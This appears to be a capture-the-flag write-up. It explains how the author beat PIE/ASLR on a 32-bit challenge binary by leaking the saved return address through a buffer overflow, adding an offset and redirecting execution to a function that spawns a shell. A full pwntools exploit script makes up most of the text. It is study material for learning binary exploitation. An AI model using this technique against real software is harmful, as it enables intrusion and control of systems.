OK this was my first encounter with pie enabled binary so the Exploit goes like this...
a) finding name_offset = eip's address - name_buffer address && the same way pass_offset
b) finding bin_offset= saved eip's value (not the address) - give_shell address
1. Leak the address of the stack eventually leaking the saved eip address
2. Calculate the offset between the eip and req address here it was func() which spawns a shell
3. Now overflow the pass_buffer with leaked eip address+offset
from pwn import *
context.bits=32
name_offset=112
pass_offset=212
#saved-eip=0xf7e1272e
bin_offset=2015403 # 2710294403 #1584672893 #2002347
p=process('aslr')
msg=p.recvuntil('?\n')
print msg
print "[+] sending name length"
p.sendline("116")
print 116
msg=p.recvuntil('?\n')
print "["+msg+"]"
print "[+] sending name"
payload="A"*name_offset
p.sendline(payload)
print p.recvuntil("Hello, ")
print p.recv(112)
a=p.recvline().strip("\n")
print "["+a+"]"
context.bits=len(a)*8
a=unpack(a)
print "[+] Leaked adress"
print hex(a)
a+=bin_offset
print "[+] Target adress"
print hex(a)
print "[+] Sending final payload"
payloads="A"*pass_offset+pack(a)
p.sendline(payloads)
p.interactive()